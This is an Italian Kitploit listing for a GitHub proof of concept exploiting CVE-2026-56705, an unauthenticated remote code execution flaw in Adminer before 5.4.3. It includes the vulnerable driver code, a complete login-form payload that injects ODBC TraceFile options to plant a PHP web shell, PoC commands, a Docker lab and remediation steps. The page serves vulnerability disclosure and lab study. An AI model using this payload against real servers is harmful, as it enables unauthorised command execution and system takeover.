Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-56705 — PoC exploit per Adminer < 5.4.3 RCE non autenticata tramite iniezione PDO DSN di MSSQL, incluso laboratorio Docker e test negativo. | Kitploit
Strumenti/GitHubGitHub/boreas37/cve-2026-56705
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHubboreas37/cve-2026-56705

CVE-2026-56705

PoC exploit per Adminer < 5.4.3 RCE non autenticata tramite iniezione PDO DSN di MSSQL, incluso laboratorio Docker e test negativo.

Vedi Repository
21 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-56705: Adminer < 5.4.3 — RCE non autenticato tramite iniezione DSN PDO MSSQL

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (avviso del fornitore) / GHSA-34q8-53jm-qc2r (database GitHub)
ProdottoAdminer (strumento di gestione database PHP a file singolo)
Versioni interessateAdminer < 5.4.3 con pdo_sqlsrv + driver ODBC Microsoft per SQL Server
Corretto in5.4.3
CVSS9.8 Critico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
TipoCWE-20 → scrittura arbitraria di file non autenticata → RCE

Riepilogo

Adminer non riesce a sanificare il campo server fornito dall'utente prima di costruire il DSN PDO per le connessioni MSSQL:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

I punti e virgola in server vengono trattati come delimitatori di attributi di connessione ODBC, quindi un attaccante non autenticato può aggiungere attributi arbitrari al DSN — inclusi TraceFile e TraceOn. La funzionalità di traccia unixODBC scrive la stringa di connessione completa (con UID={username} letterale) in TraceFile prima e indipendentemente dal successo del tentativo di connessione. Iniettare codice PHP tramite il campo username e puntare TraceFile nella root web produce una web shell.

È sufficiente un singolo POST di login non autenticato. Nessuna credenziale valida, nessuna interazione con l'utente.

Sfruttamento

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. Il POST di login costruisce il DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. Il gestore del driver ODBC scrive una traccia contenente UID={<?php ... ?>} in /var/www/shell.php
  3. La connessione fallisce (previsto, irrilevante) — il file è già stato scritto
  4. GET /shell.php?c=id → il comando viene eseguito

Utilizzo

root@kitploit:~
# solo fingerprint
python3 poc.py --target http://target/adminer.php --check

# exploit completo (scrive <random>.php nella root web)
python3 poc.py --target http://target/adminer.php --command "id"

Riproduzione in laboratorio

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

L'immagine di laboratorio rispecchia esattamente i prerequisiti dell'avviso: php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18, root web scrivibile dal processo PHP.

Rimedio

  • Aggiornare a Adminer 5.4.3+.
  • Se non è possibile aggiornare immediatamente: rimuovere/bloccare il driver mssql, oppure eliminare ; (e spazi bianchi) dai valori server forniti dall'utente tramite un reverse proxy.
  • Limitare la root web contro scritture da parte dell'utente PHP-FPM/CLI come difesa in profondità.

Crediti

L'avviso del fornitore attribuisce la scoperta congiuntamente al segnalatore e a Yashar Shahinzadeh (@voorivex).

PoC e laboratorio: Hamza Cagrici (@Boreas37)

Cronologia

DataEvento
2026-08-25CVE pubblicato / corretto in Adminer 5.4.3
Scarica lo strumento